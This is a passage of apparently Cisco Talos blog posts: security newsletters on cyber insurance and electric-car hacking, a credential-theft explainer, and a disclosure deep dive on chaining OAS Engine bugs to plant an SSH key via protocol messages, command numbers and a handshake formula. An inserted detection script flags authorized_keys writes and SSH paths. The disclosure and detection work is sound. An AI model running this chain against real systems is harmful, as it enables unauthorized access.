  • In 24 percent of engagements, attackers abused remote services, such as RDP, SSH, and SMB, to move laterally.  

Initial Access (TA0001)

  • T1190 Exploit Public-Facing Application
    • Example: Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet
  • T1078 Valid Accounts
    • Example: Adversary leveraged stolen or compromised credentials
  • T1566 Phishing
    • Example: Malicious email sent to trick users into downloading malware

Execution (TA0002)

  • T1059.001 Command and Scripting Interpreter: PowerShell
    • Example: Executes PowerShell code to retrieve information about the client’s Active Directory environment
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
    • Example: Web shells can run commands on the compromised machine

Persistence (TA0003)

  • T1053.005 Scheduled Task / Job: Scheduled Task
    • Example: Scheduled tasks were created on a compromised server
  • T1136 Create Account
    • Example: Created a user to add to the local administrator’s group
  • T1133 External Remote Services
    • Example: Adversaries use compromised credentials to log into VPNs

Defense Evasion (TA0005)

  • T1218.011 System Binary Proxy Execution: Rundll32
    • Example: Attackers can execute malicious DLL files with Rundll32
  • T1134.002 Access Token Manipulation: Create Process with Token
    • Example: Attackers created a new process using the command “run as”
  • T1562.001 Impair Defenses: Disable or Modify Tools
    • Example: Attackers can disable Windows Defender

Credential Access (TA0006)

  • T1003.001 OS Credential Dumping: LSASS Memory
    • Example: Use “lsass.exe” for stealing password hashes from memory
  • T1003.003 OS Credential Dumping: NTDS
    • Example: Use NTDSDump to gather credentials

Discovery (TA0007)

  • T1018 Remote System Discovery
    • Example: Adversaries may use ping to discover remote systems
  • T1482 Domain Trust Discovery
    • Example: Attackers may obtain information on domain trust relationships

Lateral Movement (TA0008)

  • T1210 Exploitation of Remote Services
    • Example: Attackers can abuse remote services, such as RDP
  • T1021.004 Remote Services: SSH
    • Example: Adversary made attempts to move laterally using SSH

Collection (TA0009)

  • T1005 Data from Local System
    • Example: Attackers can collect and stage data for later exfiltration from infected machines
  • T1560 Archive Collected Data
    • Example: Attackers can archive staged data using WinRAR

Command and Control (TA0011)

  • T1219 Remote Access Software
    • Example: Remote access tools found on the compromised system
  • T1105 Ingress Tool Transfer
    • Example: Attackers can use PowerShell commands, such as “Invoke-WebRequest”, to transfer tools from an external system

Exfiltration (TA0010)

  • T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
    • Example: Using FTP for file exfiltration
  • T1041 Exfiltration Over C2 Channel
    • Example: Adversaries may steal data over existing C2 channels

Impact (TA0040)

  • T1486 Data Encrypted for Impact
    • Example: Deploy Cactus ransomware and encrypt critical systems
  • T1490 Inhibit System Recovery
    • Example: Deleting shadow volume copies before ransomware execution

Why is the cost of cyber insurance rising?

25 January 2024 at 19:00

I just bought an electric car last week, so I’ve been shopping for new car insurance policies that could offer me a discount for ditching gas. 

We’re all familiar with the boring process of entering the same information 10 times over into 10 different companies’ websites trying to see who comes out the cheapest and offers the best bundles, discounts or deals. 

Unfortunately, with cybersecurity insurance, there are no bundles or “Personal Price Plans” to enroll in, and costs are rising. 

This is nothing to say about whether an organization should get cyber insurance. That is 100 percent their decision to make, and every case is going to be different. But for companies who are interested in getting these types of policies to be best prepared to recover from and deal with a potential security incident, it’s now more expensive than ever to get cyber insurance. 

A report last week from Dark Reading indicated that cyber insurance costs are expected to rise over the next 12 to 24 months. This would be after premiums for these plans rose 50 percent in 2022, according to Bloomberg, though they largely held steady in 2023. 

This problem isn’t isolated to just the U.S., either. A November report from business continuity service Databarracks surveyed companies in the U.K. and found that nearly a third of respondents said their cyber insurance had increased in cost over the past year, while more companies than ever said they had any type of cyber insurance policy, implying a totally new line item for their budgets. 

This rising cost could certainly be attributed to all the classic factors of why anything gets more expensive: market demand, inflation, rising costs of doing business, etc. But an increase in ransomware activity seems to be a large driver, too. 

The same Databarracks survey found that 24 percent of all IT downtime for respondents was due to a cyber incident, up 14 percent from 2018. Thirty-seven percent of all companies said they experienced a ransomware attack in 2023, and more than half experienced some sort of security incident in general. 

As we saw in our most recent Talos Incident Response Quarterly Trends Report, ransomware may rise again after a relatively quiet period from mid-2022 through the summer of 2023. Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Talos IR, a 17 percent increase from the previous quarter. 

That’s not to say that it’s a lock that ransomware attacks are going to be up in 2024, but if they are, cyber insurance policies are only going to get more expensive, which means further shifting budgets for companies of all sizes.  

There is no one-size-fits-all approach for how anyone should approach getting a cybersecurity insurance policy. Still, if companies can’t steady the cost of premiums, it may send executives shopping for other, potentially less effective, methods of preparing for a cyber attack. 

The one big thing 

Cisco Talos Incident Response (Talos IR) saw a significant increase in ransomware activity in its engagements during the fourth quarter of 2023, while education remains one of the most targeted sectors. Talos IR also observed several brand new ransomware operations for the first time in Q4, including Play, Cactus, BlackSuit and NoEscape. The latest Talos IR Quarterly Trends Report has a full breakdown of the top threats they saw in the wild and an idea of where attacker tactics might be headed in 2024. 

Why do I care? 

This was the first time in all of 2023 that the rate of ransomware attacks rose during IR engagements. Education and manufacturing were tied for the most targeted verticals, accounting for nearly 50 percent of the total number of incident response engagements, so those industries should note Talos IR’s findings. 

So now what? 

The lack of MFA remains one of the biggest impediments to enterprise security and led to many of the attacks Talos IR saw in Q4. All organizations should implement some form of MFA, such as Cisco Duo. 

Top security headlines of the week 

One of the largest password dumps ever was posted last week to an online forum, seemingly containing more than 25 million login credentials that had never been leaked before. In all, the collection includes 71 million unique credentials for a range of websites, including the online video game “Roblox,” Yahoo, Facebook and eBay. Though many of these credentials had already been leaked in the past, the user hosting the file claims they all came through an information-stealing malware that collected the usernames and passwords in plain text. Credentials that are stolen via data breaches often contain encrypted passwords. The operator behind the website Have I Been Pwned? first discovered the trove of data earlier this month, but it’s likely been in circulation in various online forums for at least four months. Each line in the dataset, which consists of images and plain text, includes a login URL, the associated account’s name and a password. (Ars Technica, Bleeping Computer) 

A new report indicates that each Facebook user could be sharing their personal data with thousands of other companies. The study, conducted by the non-profit Consumer Reports, followed more than 700 volunteers’ Facebook accounts and found that, on average, each participant in the study had their data sent to Facebook by 2,230 companies. Some respondents had their data shared with more than 7,000 different companies, and in all, the study captured more than 180,000 organizations that shared data with Facebook. The study was specifically meant to capture “server-to-server” tracking, in which personal data goes from a company’s servers to those of Meta, Facebook’s parent company. The more “traditional” form of tracking for Meta, through pixels on other companies’ websites, can easily be spotted in a web browser, while server-to-server tracking cannot. The three companies that appeared most often connected to participants’ accounts in the study were all data brokers, who presumably turned around and sold that data to additional companies for a profit. Consumer Reports listed multiple recommendations for Facebook to improve its data protection, including improving the transparency of Facebook’s data collection tools, making it easier for users to opt out of data sharing and asking the U.S. government to pass data minimization laws. (Consumer Reports, The Markup) 

Apple released a series of security updates this week for its devices that fixed three vulnerabilities in the WebKit browser engine that were already being exploited in the wild. One of the vulnerabilities, CVE-2024-23222, is believed to have been exploited in more recent versions of Apple’s mobile operating system iOS. An attacker could exploit this vulnerability to execute remote code on the targeted device. Two other vulnerabilities, CVE-2023-42916 and CVE-2023-42917, were likely exploited in versions of iOS dating back to before 16.7.1. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2024-23222 to its Known Exploited Vulnerabilities (KEV) list. Apple released patches for all its devices, including the Apple TV streaming box, iPad and macOS desktop computers. (SecurityWeek, Computer Weekly) 

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week 


OAS Engine Deep Dive: Abusing low-impact vulnerabilities to escalate privileges

31 January 2024 at 17:00

Open Automation Software recently released patches for multiple vulnerabilities in their OAS Engine.

Cisco Talos publicly disclosed these issues after working with Open Automation Software to ensure that patches were available for users. Now that a fix has been released with Version 19, we want to take the time to dive into a few of these vulnerabilities and show how a handful of bugs that could each be viewed as low-impact can be chained together to carry out various malicious actions, even going as far as gaining access to the underlying system.

Background

The OAS Platform facilitates the simplified transfer of data between various proprietary devices and applications. It can connect products from multiple vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

Vulnerabilities

During this research, we discovered eight vulnerabilities, five of which are covered here. Full technical details can be found in the respective vulnerability reports: 

TALOS-2023-1769

TALOS-2023-1770

TALOS-2023-1771

TALOS-2023-1772

TALOS-2023-1773

TALOS-2023-1774

TALOS-2023-1775

TALOS-2023-1776

Bypass authentication via default configuration

TALOS-2023-1769 (CVE-2023-31242)

By default, when the OAS Engine is installed, no admin application user is set. Without an admin application user, no authentication is required to access certain functionality that would otherwise require valid credentials, including creating new users. Additionally, if an admin user is created, but the configuration is not saved before the OAS Engine restarts, those changes will be lost and the system will revert to disregarding the authentication structure.

Bypass authentication via stolen U_EP

TALOS-2023-1770 (CVE-2023-34998)

When a privileged request is sent by a legitimate administrator to the OAS Engine, the traffic is sent unencrypted across the wire. As such, it is possible for a bad actor capable of sniffing traffic between the client and the OAS Engine to capture a valid U_EP authentication structure. The attacker can then reuse that structure to craft their own privileged request. Any captured U_EP remains valid until the associated user account has been deleted.

File overwrite

TALOS-2023-1771 (CVE-2023-32615)

The OAS configuration tool provides a feature to save the running configuration to disk on the OAS engine server. When this information gets saved, the user specifies the path and filename, restricted only by the permissions of the underlying OAS user system account. If the chosen file already exists, the contents of that file will be replaced with the configuration data.

Add user unsanitized input

TALOS-2023-1772 (CVE-2023-34317)

Access to the various features of the OAS Engine and associated data is controlled through the use of OAS engine application users. 

Application administrator users can add additional users to the application with varying levels of permissions. These users exist within the OAS Engine exclusively, not on the underlying system. When adding a user, no filtering is performed on the value entered for the username, allowing a wide variety of characters not appropriate for a username to be entered and subsequently stored in the running configuration.

List directory

TALOS-2023-1774 (CVE-2023-32271)

Through the OAS Configuration tool, the functionality to load a saved configuration from disk or save a running configuration to disk is exposed to authenticated application users. 

Accompanying the configuration management tools is a remote file browser that allows users to see what files exist on the remote system.

Attack walkthrough

By combining these vulnerabilities, it is possible to gain access to the underlying system as the user running the OAS Engine. 

In this scenario, an adversary could: 

  1. Gain access to a valid authentication structure.
  2. Search the filesystem for evidence of an SSH server.
  3. Store an SSH key in the running OAS configuration.
  4. Write the running configuration to disk.

Interacting with the OAS Engine

Before an adversary can make any of the requests needed to exploit the system, they’d need to understand the protocol used by the OAS Configuration utility. These requests consist of two related Protobuf structures — Client_Send and OASPacket — concatenated together and sent to the OAS Engine via TCP/58727 (by default). Responses to these requests will be delivered in a similar format, replacing the Client_Send Protobuf with a Server_Send.

The Server_Send Protobuf takes the following form, where the Handshake and Offset fields must be retained if a subsequent Client_Send is to be sent. 

message Server_Send {
  int32 Version = 1;
  int32 OASVersion = 2;
  int32 Handshake = 3;
  int32 Offset = 4;
  int32 Length = 5;
}

The Client_Send Protobuf takes the following form, where Version is 0x01, and Length is the size in bytes of the OASPacket Protobuf:

message Client_Send {
  int32 Version = 1;
  int32 ClientHandshake = 2;
  int32 Handshake = 3;
  int32 Length = 4;
}

The ClientHandshake and Handshake fields are used in a client/server handshake that is likely in place to prevent replay attacks. ClientHandshake is a randomly generated value less than or equal to 0x3FFFEC75 that will be used in a subsequent request's handshake process. Handshake is calculated from the Handshake and Offset fields of the prior Server_Send response and the ClientHandshake field of the prior Client_Send request: add the server's Handshake and Offset together, subtract both 0x12CB and the previous ClientHandshake, and finally add 0x888. This can be better visualized with the following formula:

handshake = server_send_handshake + server_send_offset - 0x12CB - previous_client_send_handshake + 0x888

The OASPacket Protobuf takes the following form, where LDCMode, LDCHost, and SendingGUID are not always necessary, Version is 0x01, CommandNumber defines the type of request being sent, and DataAsBytes is a set of serialized Protobufs describing the request data. 

message OASPacket {
  int32 Version = 1;
  int32 LDCMode = 2;
  int32 CommandNumber = 3;
  string LDCHost = 4;
  string SendingGUID = 5;
  bytes DataAsBytes = 6;
}

Many of the requests contain a field of the custom type U_EP. This field contains a serialized copy of credentials used to authenticate privileged requests. The U_EP Protobuf takes the following form, where Version is 0x01, and Seed is a random value used to encrypt the credentials:

message U_EP {
  int32 Version = 1;
  int32 Seed = 2;
  bytes DataAsBytes = 3;
}

The DataAsBytes field contains a serialized and encrypted User_EncryptedPassword Protobuf, which takes the following form:

message User_EncryptedPassword {
  string Username = 1;
  string EncyprtedPassword = 2;
}

By combining the generic structures discussed here with the request-specific structures discussed later, an adversary could replicate the desired communications with the OAS Engine. 

Bypass authentication

Many of the requests necessary to successfully interact with the OAS Engine require authentication. At this time, two options exist to bypass this authentication requirement: abusing the default configuration or reusing a valid authentication structure. 

Option 1: Abusing Default Configuration

As the requests needed to gain access require authentication, it is necessary first to acquire a valid U_EP structure. 

The easiest way to obtain valid credentials is to use the vulnerability disclosed in TALOS-2023-1769. This vulnerability is only exploitable in cases where the OAS Engine is still running its default configuration. To determine if the target in question is vulnerable, an OASPacket with Version set to 0x01 and CommandNumber set to 0x13F can be used. When correctly sent, the server will return a response with the following format:

message Version_Runtime_License {
  int32 Version = 1;
  bool Runtime = 2;
  string LicenseString = 3;
  string MtcExpirationString = 4;
  bool NetCore = 5;
  bool WinOS = 6;
  bool LinuxOS = 7;
  string AssemblyVersion = 8;
  string BaseDirectory = 9;
  bool EnableActiveDirectory = 10;
  string ActiveDirectoryEntry = 11;
  string ActiveDirectoryFilter = 12;
}

If the server is vulnerable to TALOS-2023-1769, the MtcExpirationString field will contain the string "Create an Admin User." In this state, the server does not perform any verification of the U_EP structure, allowing privileged requests by unauthenticated users as long as any value is provided in the U_EP field.

If an admin user has already been created, the OAS Engine will not be vulnerable to TALOS-2023-1769 and will require a different approach. The vulnerability disclosed in TALOS-2023-1770 provides an alternative way to obtain a valid U_EP.

Option 2: Pass the U_EP

This vulnerability occurs when legitimate configuration requests, including privileged ones, are sent to the OAS Engine. Most of these messages are sent in cleartext, as disclosed in TALOS-2023-1770. The exception is a field within the U_EP authentication structure, referred to within the OAS Platform as the User_EncryptedPassword. The User_EncryptedPassword is a block of data containing the authenticating username and associated encrypted password that is supplied as a block of AES-encrypted, serialized data to the DataAsBytes field in a U_EP authentication structure, as shown below.

message U_EP {
  int32 Version = 1;
  int32 Seed = 2;
  bytes DataAsBytes = 3;
}

message User_EncryptedPassword {
  string Username = 1;
  string EncyprtedPassword = 2;
}

While it is possible to decrypt the User_EncryptedPassword and get access to the raw username and encrypted password (TALOS-2023-1776), it is not necessary for authentication. 

When a legitimate U_EP is built, a value is randomly generated and stored in the Seed field of the structure. This seed is subsequently used to build the AES key used to encrypt the User_EncryptedPassword data. This process generally results in a different U_EP value for each new configuration session when conducted through the official tool, but this process does not cause prior sessions to be terminated. 

If an attacker obtains access to legitimate configuration traffic by sniffing network traffic, obtaining an old traffic capture, or any other method, they can extract the U_EP structure and successfully authenticate for as long as the associated user exists within the OAS Engine. 

Explore the Filesystem

With the ability to successfully send authenticated messages, we can leverage the vulnerability disclosed in TALOS-2023-1774 to explore the filesystem. 

From here a variety of approaches could be taken, but for this deep dive, we are looking for the existence of the sshd_config file in /etc/ssh/ and the .ssh directory in the OAS user's home directory, indicating that an SSH server is likely enabled on the system. 

We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x0F. Additionally, the DataAsBytes field will need to be filled with a serialized Browse_File Protobuf containing a valid U_EP, the GetDirectories and GetFiles flags set, a DirectoryPath set to the absolute path of the desired location, and a FileExtension field containing an asterisk to indicate any file type.

message Browse_File {
  int32 Version = 1;
  U_EP UEP = 2;
  bool GetDrives = 3;
  bool GetDirectories = 4;
  bool GetFiles = 5;
  string DirectoryPath = 6;
  string FileExtension = 7;
}

When successfully sent, the OAS Engine will respond with the results in a Browse_File_Result Protobuf, containing all of the data organized by type. 

message Browse_File_Result {
  bool Success = 1;
  optional string ErrorString = 2;
  repeated string Drives = 3;
  repeated string Directories = 4;
  repeated string ShortDirectories = 5;
  repeated string Files = 6;
  repeated string ShortFileNames = 7;
}

Upload new SSH key

After verifying with some certainty that an SSH server is running, it is possible to leverage TALOS-2023-1771 and TALOS-2023-1772 to upload a new SSH key and subsequently gain access to the underlying system.

Since there is not any dedicated file upload functionality exposed by the OAS Engine, it is necessary to get more creative. By combining the improper input validation vulnerability disclosed in TALOS-2023-1772 with the external control of the filename vulnerability disclosed in TALOS-2023-1771, it is possible to create a makeshift file upload process. 

Note: while functional for this scenario, this technique will result in a file whose contents cannot be fully controlled. As such, it is likely to create a file that would be considered corrupt by most applications.

When adding a new application user to the OAS Engine, the user details are taken and written to the running OAS Engine configuration. During this process, no verification is performed to ensure that the value entered contains exclusively characters that make sense for a username. Additionally, there is no limit on the length of the username. 

By supplying the entirety of an SSH public key that we control as the username of a new entry, it is possible to abuse this lack of verification to get our desired file data stored in the running OAS configuration

We can do this through the use of an OASPacket with Version set to 0x01 and CommandNumber set to 0x88. Additionally, the DataAsBytes field will need to be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value containing the public key data. 

message String {
  int32 Version = 1;
  U_EP UEP = 2;
  string String = 3;
}

With our key stored in the running configuration, we can then trigger it to get written to a file of our choice, in this case the OAS user's authorized_keys file, by saving the configuration to disk. While the file will contain a large amount of OAS configuration information that is meaningless to the SSH server, the public key supplied via a username will still be interpreted successfully as long as it is surrounded by newline characters.

We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x74. The DataAsBytes field must again be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value, this time containing the absolute path to the file where the configuration should be written. 

message String {
  int32 Version = 1;
  U_EP UEP = 2;
  string String = 3;
}

If everything works correctly and the target has its SSH server running, it will be possible to log in as the underlying OS user running the OAS engine via SSH.
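A detection-side example added here (it is not Talos's or Open Automation Software's code): a Python scanner that decodes captured OASPacket payloads and flags the three request types the walkthrough chains together, so that a network sensor or IR analyst can spot the pattern in TCP/58727 traffic. The command numbers and field positions are those quoted above; the hand-rolled Protobuf codec, the path and username heuristics, the placeholder U_EP bytes and the sample packets are all constructed for this example.

```python
# Minimal Protobuf wire-format codec (varints and length-delimited fields only) so
# the scanner runs without the protobuf package; constructed for this example.

def _read_varint(buf, pos):
    """Decode a base-128 varint at pos; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b, pos = buf[pos], pos + 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7

def decode_fields(buf):
    """Return {field_number: [values]}: int for wire type 0, bytes for wire type 2."""
    fields, pos = {}, 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        field, wtype = tag >> 3, tag & 0x7
        if wtype == 0:
            val, pos = _read_varint(buf, pos)
        elif wtype == 2:
            length, pos = _read_varint(buf, pos)
            val, pos = buf[pos:pos + length], pos + length
            if len(val) != length:
                raise ValueError("truncated length-delimited field")
        else:
            raise ValueError(f"unsupported wire type {wtype} in field {field}")
        fields.setdefault(field, []).append(val)
    return fields

def _varint(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append((b | 0x80) if n else b)
        if not n:
            return bytes(out)

def encode_fields(items):
    """Encode [(field, value)]: int -> varint, str/bytes -> length-delimited."""
    out = bytearray()
    for field, value in items:
        if isinstance(value, int):
            out += _varint(field << 3) + _varint(value)
        else:
            data = value.encode() if isinstance(value, str) else value
            out += _varint(field << 3 | 2) + _varint(len(data)) + data
    return bytes(out)

# OASPacket command numbers and payload field positions as quoted in the write-up.
CMD_BROWSE_FILE = 0x0F  # DataAsBytes = Browse_File; field 6 = DirectoryPath
CMD_SAVE_CONFIG = 0x74  # DataAsBytes = String; field 3 = destination path
CMD_ADD_USER = 0x88     # DataAsBytes = String; field 3 = new username
SSH_KEY_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-")

def _text(fields, number):
    return fields.get(number, [b""])[0].decode("utf-8", "replace")

def inspect_oas_packet(packet):
    """Decode one OASPacket; return [(command, reason, detail)] for suspicious requests."""
    outer = decode_fields(packet)
    cmd = outer.get(3, [None])[0]                   # OASPacket.CommandNumber
    inner = decode_fields(outer.get(6, [b""])[0])   # OASPacket.DataAsBytes
    findings = []
    if cmd == CMD_BROWSE_FILE:
        path = _text(inner, 6)
        if path.startswith("/etc/ssh") or "/.ssh" in path:
            findings.append((cmd, "directory listing of an SSH path", path))
    elif cmd == CMD_ADD_USER:
        name = _text(inner, 3)
        if name.startswith(SSH_KEY_PREFIXES):
            findings.append((cmd, "username looks like an SSH public key", name[:32]))
        elif len(name) > 64 or any(c.isspace() for c in name):
            findings.append((cmd, "username length or characters are abnormal", name[:32]))
    elif cmd == CMD_SAVE_CONFIG:
        path = _text(inner, 3)
        if path.endswith("authorized_keys") or "/.ssh/" in path or path.startswith("/etc/"):
            findings.append((cmd, "configuration saved to a sensitive path", path))
    return findings

def scan(packets):
    # Input: OASPacket payloads with the leading Client_Send already stripped.
    return [f for p in packets for f in inspect_oas_packet(p)]

# Constructed fixtures, not real traffic. The U_EP is a placeholder with only Version set.
FAKE_UEP = encode_fields([(1, 1)])

def _packet(command, inner_items):
    inner = encode_fields([(1, 1), (2, FAKE_UEP)] + inner_items)
    return encode_fields([(1, 1), (3, command), (6, inner)])

SAMPLE_PACKETS = [
    _packet(CMD_BROWSE_FILE, [(4, 1), (5, 1), (6, "/etc/ssh/"), (7, "*")]),
    _packet(CMD_ADD_USER, [(3, "operator2")]),
    _packet(CMD_ADD_USER, [(3, "ssh-ed25519 AAAAC3NOTAREALKEY== analyst@example")]),
    _packet(CMD_SAVE_CONFIG, [(3, "/home/oas/.ssh/authorized_keys")]),
    _packet(CMD_SAVE_CONFIG, [(3, "/opt/oas/backup.oasconfig")]),
]
```

Run `scan(SAMPLE_PACKETS)` to see the three suspicious requests reported while the two benign ones (a normal username and a save to a configuration directory) produce nothing.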

Mitigations

Before the release of this walkthrough and the associated vulnerabilities, Cisco Talos worked with Open Automation Software to ensure that patches were made publicly available in Version 19. All users are recommended to upgrade to the latest version. 

Snort rules (SIDs 61991 - 61994, 62003 and 62004) can detect exploitation of these vulnerabilities; download the latest rule sets from Snort.org. Our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

The many ways electric cars are vulnerable to hacks, and whether that matters in a real-world

1 February 2024 at 19:00

I’d hate to be labeled a “car guy” now that I’ve mentioned my new electric car in the lede of two newsletters in a row, but I couldn’t resist. 

I’d been reading headlines for years about how electric cars (most notably Tesla) were vulnerable to a range of security vulnerabilities, even some that could allow bad actors to steal the car if they were close enough to the car’s keys. While I don’t own a Tesla, I am now more invested in following the various ways attackers can take advantage of the connectivity of electric cars. 

I’ve bemoaned before that everything is “smart” now, but there’s no escaping it if you want to convert to an electric vehicle. They’re all Wi-Fi connected so drivers can control the charging speed and timing of their cars, monitor public charging stations and communicate with the dealer about any electrical failures. 

A whole new slew of electric car-related vulnerabilities came out last week thanks to the Pwn2Own hacking event in Tokyo as part of the Automotive World conference. Car and charging companies were offering a combined $1 million in bug bounty payments for researchers who could find security vulnerabilities in a range of cars and electric car-related products like home chargers. 

In all, researchers discovered 49 zero-day vulnerabilities, including a two-vulnerability exploit chain in Tesla cars that could allow an attacker to take over the onboard infotainment system. Other vulnerabilities were discovered in ChargePoint and Juicebox products, two prominent manufacturers of home, travel and commercial electric charging equipment. Although few details are available on the specific vulnerabilities, the Zero Day Initiative said on its blog that one researcher “was able to execute his attack against the ChargePoint Home Flex.” 

Some of these exploits are funny to read about. Imagine an attacker taking the time to hack into a Tesla’s modem so they can turn on a car’s windshield wipers without the driver knowing. Tesla stated after Pwn2Own that none of the vulnerabilities discovered would be more than an annoyance for the driver.  

Certainly, previous vulnerabilities that could allow someone to drive away with your car would be more than an annoyance, but this latest batch of bugs has lower stakes than that.  

I could see a lot of traditionalists being hesitant to switch to electric cars because their 2011 Toyota Corolla doesn’t require the internet to run. That doesn’t mean that owning an electric car or installing a home charger is inherently risky. I would argue that the average IoT device or home router poses a higher risk of expanding your home network’s attack surface, because those devices are often overlooked in security.  

As weird as it is to say, just like you patch an IoT device, it’s important to patch the firmware on your vehicle (gas-powered or not) regularly. Still, I’m not sure it’s time to just assume your electric car is going to be hacked like in “Cyberpunk 2077” because these vulnerabilities are out there. 

The one big thing 

The FBI says it’s shut down the recently emerged Volt Typhoon, a Chinese state-sponsored actor. FBI Director Christopher Wray announced the disruption Wednesday during a hearing with a U.S. House committee. Volt Typhoon was first disclosed in mid-2023 for targeting outdated wireless routers, including some belonging to U.S. critical infrastructure. The hackers had been targeting U.S. water treatment plants, the power grid, oil and natural gas pipelines, and transportation systems, Wray said. 

Why do I care? 

Aging network infrastructure is a problem for all users across the globe. As highlighted by Talos’ report on JaguarTooth last year, unpatched routers or older routers with security vulnerabilities are easy targets for state-sponsored actors, and they can often sit unnoticed on these devices for months or years. Volt Typhoon is particularly notable for its targeting of high-risk sectors and U.S. military bases.  

So now what? 

The FBI and U.S. Cybersecurity and Infrastructure Security Agency warned router vendors to patch their devices as soon as possible to prevent the exploitation of vulnerabilities Volt Typhoon is known for using. All users should check to make sure their routers, regardless of make, model or age, have the latest firmware installed. We also have several recommendations for everyone to defend their network infrastructure and upgrade to newer hardware. 

Top security headlines of the week 

Ads displayed in several different popular mobile apps are part of a mass global surveillance effort, with the information eventually being sold to national security agencies that can track the physical location, hobbies, and names of users’ family members. The ad-based tool, known as Patternz, strikes deals with smaller ad networks to gather information from users’ devices when they access some apps like Kik messenger and the 9gag online forum. While reporting from 404 Media shows a specific example targeting an Android user, the same methods work on iOS devices. Separately, security researchers also found that many push notifications on iPhones are unknowingly sending user information back to apps, even if the user doesn’t have those apps installed. When triggered, some push notifications will send app analytics and device information to remote servers belonging to other apps like TikTok, Facebook, Instagram and X, formerly known as Twitter. (404 Media, 9to5 Mac) 

A cyber attack disrupted nearly all the government services of Fulton County, Georgia, this week, with systems still recovering as of Wednesday afternoon. The attack is notable because Fulton County is where former U.S. President Donald Trump is charged and being tried for his involvement in trying to overturn the results of the 202 presidential election. The cyber attack also targeted the office of the District Attorney who investigated and is charging Trump. The county’s government phone systems were all down, as was access to court filings, tax processing and more. Law enforcement was still investigating the attack as of Wednesday afternoon, though county officials said they had not seen any evidence that personal information of employees or citizens had been stolen. (NBC News, CNN) 

Cozy Bear, a well-known Russian APT, is reportedly behind two recent breaches at Microsoft and Hewlett Packard Enterprise (HPE). Microsoft, which calls the group “Midnight Blizzard,” said in a blog post that it detected a state-sponsored attack on its internal systems on Jan. 12, 2024. Microsoft stated that the actor got in by abusing user accounts “to create, modify, and grant high permissions to OAuth applications that they can misuse to hide malicious activity.” This was the second time in six months that Microsoft disclosed a state-sponsored actor targeting its internal systems. In the case of Cozy Bear, the hacking group allegedly monitored the email accounts of senior Microsoft executives and members of the company’s cybersecurity teams. Executives from HPE filed a notice with the U.S. Securities and Exchange Commission last week stating that the same actor “gained unauthorized access to HPE’s cloud-based email environment.” HPE said the actor initially gained access through a compromised Microsoft Office 365 email account. (Microsoft, Ars Technica) 

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week 


How are user credentials stolen and used by threat actors?

6 February 2024 at 08:30

You’ve no doubt heard the phrase, “Attackers don’t hack anyone these days. They log on.” 

By obtaining (or stealing) valid user account details, an attacker can gain access to a system, remain hidden, and then elevate their privileges to “log in” to more areas of the network.  

Unfortunately, the use of valid accounts is prevalent across the threat landscape. It was the second-most common MITRE ATT&CK technique that Talos observed in our threat telemetry in 2023. 26% of all Cisco Talos Incident Response engagements last year involved the use of valid accounts. 

In figures from Incident Response engagements from the fourth quarter of 2023, the top means of gaining initial access was a tie between the use of compromised credentials on valid accounts and exploiting public-facing web applications. 36% of malicious tooling was also focused on accessing and collecting credentials. You can read more about this in our Incident Response Quarterly Trends report. 

The pervasiveness of these types of attacks is driven by a few key reasons: 

  1. Most companies think that cyber attacks will come from “the outside in.”   

Attacks that use valid accounts to log on take more of an “inside-out” approach. Once initial access is gained, the attacker is already stealthily inside the network, and there is a greater chance they will evade detection while trying to move laterally, especially if the network is unsegmented. In short, exploiting a vulnerability can certainly lead to initial access, but authorized credentials help the adversary navigate laterally under the radar. 

  2. Stolen credentials are for sale on the dark web.  

Effectively, some threat actors are in the business of stealing credentials simply to sell them to the highest bidder. Actors who purchase them may well use them for a larger targeted ransomware campaign and/or for espionage purposes. The higher the privileges attached to an account (for example, one belonging to someone who works in finance or has access to networking devices), the higher the price.  

  3. Attackers are following the trends of how we work today.  

We’re accessing more systems remotely, we’re accessing company systems on our own devices, and cloud solutions are becoming increasingly commonplace. From a threat actor’s perspective, the mindset is shifting: “Why force my way into a system when I can just log in?” 

Speaking of those remote working trends, across the broader Cisco organization we now see 1.5 billion multi-factor authentication requests every month (via Cisco Duo). For each authentication request, Duo evaluates whether it is a legitimate request from a trusted user or a bad request from an attacker.  

The lack of MFA (or poorly installed MFA) is frequently the No. 1 security weakness in our Talos Incident Response Quarterly Trends report (as was the case in Q4 2023). According to Oort, whom Cisco acquired in 2023, 40% of enterprise customers have no MFA, or use weak MFA (for example, clear text SMS). This appears to be contributing to the challenge of bad actors using valid accounts as a key initial access tactic. 

So how are attackers effectively ‘logging on’ with valid account credentials? Here are some tactics that we frequently encounter within Talos threat telemetry and Incident Response engagements: 

Credentials stolen from password stores 

Credentials stolen from password stores took the No. 4 spot in the top 20 list of the most common MITRE ATT&CK techniques Talos saw in 2023. This happens when users store passwords in various applications or web browsers, and adversaries search the common password storage locations for the passwords saved there. Threat actors have used this technique for many years, but the rate at which it still succeeds highlights why organizations and individuals should use dedicated password managers rather than the ones built into web browsers. 

Credentials stolen from fake login portals via phishing campaigns 

Attackers will often try to replicate common login portals, such as Microsoft Office 365, and may send the user a phishing email asking them to log in because of some issue with their account. On the surface, the web page looks legitimate, but it is a fake copy with malicious code behind it designed to capture user account details. 

Input capture 

